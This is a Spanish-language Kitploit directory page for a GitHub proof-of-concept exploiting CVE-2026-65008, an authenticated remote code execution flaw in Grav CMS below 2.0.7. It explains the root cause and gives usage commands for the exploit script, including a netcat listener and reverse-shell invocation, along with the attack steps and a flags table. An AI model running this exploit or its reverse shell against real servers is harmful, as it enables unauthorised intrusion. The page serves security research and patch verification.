Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-65008 — CVE-2026-65008 | Kitploit
Herramientas/GitHubGitHub/zer0dayf/cve-2026-65008
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPapers & ResearchLearning & Education
GitHubzer0dayf/cve-2026-65008

CVE-2026-65008

CVE-2026-65008

Ver Repositorio
1hace 23 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-65008 — Grav CMS < 2.0.7 RCE autenticada

Prueba de concepto para CVE-2026-65008: ejecución remota de código autenticada en Grav CMS mediante call_user_func_array() sin restricciones en Blueprint::dynamicData().

Un usuario con admin.pages (o api.pages.write) puede insertar un frontmatter malicioso en un formulario. El payload se ejecuta como el usuario del servidor web cuando cualquier visitante (incluidos los no autenticados) carga la página.

Solo pruebas autorizadas. Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito.

Créditos

Rol
Investigadores de la vulnerabilidadYuvalMil, MatiHub25, LeonKaya
Aviso del proveedorGHSA-fj2p-qj2f-74v5
Este repositorioPoC de laboratorio independiente / automatización

CVE: https://www.cve.org/CVERecord?id=CVE-2026-65008

Causa raíz

Blueprint::dynamicData() pasa un callable Class::method controlado por el atacante y argumentos a call_user_func_array() de PHP sin lista de permitidos. Combinado con Grav\Common\Utils::arrayFilterRecursive como trampolín, esto alcanza system() / passthru / etc.

Corregido en Grav 2.0.7+.

CVSS

9.8 CRÍTICO — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Requisitos

  • Python 3.10+
  • requests

Instalación:

root@kitploit:~
pip install -r requirements.txt

Uso

Ejecución de comandos

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' -c "id"

Reverse shell

Inicia el listener primero:

root@kitploit:~
nc -lvnp 4444

Luego:

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' --lhost YOUR_IP --lport 4444

Argumentos

Flujo

  1. Inicia sesión en /admin (extrae login-nonce)
  2. Obtén admin_nonce desde el panel de administración
  3. Guarda una página cuyo frontmatter contenga el gadget data-opts@:
  4. Dispara con una GET no autenticada → RCE como www-data

Aviso legal

Este proyecto es únicamente para investigación de seguridad educativa y autorizada. El autor no es responsable del mal uso. Obtén siempre permiso por escrito antes de probar sistemas de terceros. La vulnerabilidad original fue divulgada a través del aviso del proveedor; este repositorio solo demuestra la reproducción en laboratorio.

Referencias

  • https://github.com/getgrav/grav/security/advisories/GHSA-fj2p-qj2f-74v5
  • https://nvd.nist.gov/vuln/detail/CVE-2026-65008
  • https://www.cve.org/CVERecord?id=CVE-2026-65008

Licencia

Para uso en investigación. Sin garantía.

Descargar herramienta
FlagDescripción
-u, --urlURL base del objetivo (obligatorio)
-U, --usernameUsuario administrador / con edición de páginas (por defecto: admin)
-P, --passwordContraseña (obligatoria)
-c, --commandComando a ejecutar (por defecto: id)
--lhostLHOST de la reverse shell
--lportLPORT de la reverse shell (por defecto: 4444)
--folderNombre de la carpeta de la página (por defecto: rcepoc)
--no-verifyDeshabilitar verificación TLS